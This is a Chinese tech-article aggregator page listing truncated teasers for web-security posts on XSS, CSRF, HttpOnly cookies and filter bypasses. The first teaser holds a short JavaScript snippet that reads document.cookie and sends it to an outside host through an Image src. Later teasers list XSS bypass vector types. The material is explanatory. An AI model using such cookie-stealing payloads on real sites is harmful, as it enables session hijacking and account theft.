xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。
如下js获取cookie信息:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src=’http://www.******.c...
分类:
其他好文 时间:
2014-05-22 08:24:14
阅读次数:
273
Web安全测试之XSSXSS 全称(Cross Site Scripting) 跨站脚本攻击,
是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),
当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网...
分类:
Web程序 时间:
2014-05-17 20:20:05
阅读次数:
371
CSRF(Cross-site request
forgery),中文名称:跨站请求伪造,也被称为:one click attack/session
riding,缩写为:CSRF/XSRF。一般来说,CSRF是除XSS外最常见一种漏洞,也是一大刷分利器。有关CSRF的具体利用,CEO早在 08年就...
分类:
其他好文 时间:
2014-05-16 04:30:14
阅读次数:
410
0x01 什么是CSRF攻击 CSRF是Cross Site Request
Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把它想做HTTP会话劫持。
网站是通过cookie...
分类:
其他好文 时间:
2014-05-15 21:20:25
阅读次数:
244
本系列的译文暂停很久了,今后每周一篇直至完成
原文地址:
http://www.jtmelton.com/2012/02/07/year-of-security-for-java-week-6-csrf-prevention-in-java/
Whatis it and why should I care?
跨站点请求伪造(CSRF)是指受害者当被一个网站授权后,在其未知觉的情况下...
分类:
编程语言 时间:
2014-05-15 05:39:02
阅读次数:
322
常见攻击方式:XSS、SQL注入、木马、零日攻击、僵尸网络、资源枚举、参数操作、跨站请求伪造、钓鱼欺骗、Dos攻击拒绝服务等。常用防止方式:黑名单过滤(有时候我们在对网站过来的请求进行黑名单处理
把那些暴漏出来的攻击方法写在黑名单中 当请求过来的时候第一时间去 用黑名单进行过虑 但是 这样的话就要时...
分类:
Web程序 时间:
2014-05-13 20:04:34
阅读次数:
596
. time attributename 和 values
联用xxx直接在元素上使用:防止单行代码看不见防止单行代码看不见2. time onbegin ,比较鸡肋的地方是,只要有onxxx过滤器的,就没啥用3.
time set attributename toxxx4. vml onmouse...
分类:
Web程序 时间:
2014-05-08 19:01:38
阅读次数:
454
攻击XSS漏洞的一种有效载荷,就是使用嵌入式JavaScript访问document.cookie属性,截获受害者的会话令牌。HttpOnly
cookie是某些浏览器所支持的一种防御机制,许多应用程序使用它防止这种攻击有效载荷执行。当应用程序设定一个cookie时,它可能在Set-Cookie消息...
分类:
其他好文 时间:
2014-05-08 14:30:50
阅读次数:
266
1)普通的XSS
JavaScript注入(2)IMG标签XSS使用JavaScript命令(3)IMG标签无分号无引号(4)IMG标签大小写不敏感(5)HTML编码(必须有分号)(6)修正缺陷IMG标签”>(7)formCharCode标签(计算器)(8)UTF-8的Unicode编码(计算器)(...
分类:
其他好文 时间:
2014-05-08 14:12:06
阅读次数:
415
XSS,即跨站脚本攻击。SOHU视频XSS漏洞导致其用户成为DDOS肉鸡,该攻击是利用的一个持久性XSS,通过找到一个访问量很大网站的xss,在其网站上插入一段js代码,当其用户访问网站之后,就可以利用该网站的用户对其受害者发起攻击。...
分类:
其他好文 时间:
2014-05-06 22:42:53
阅读次数:
418
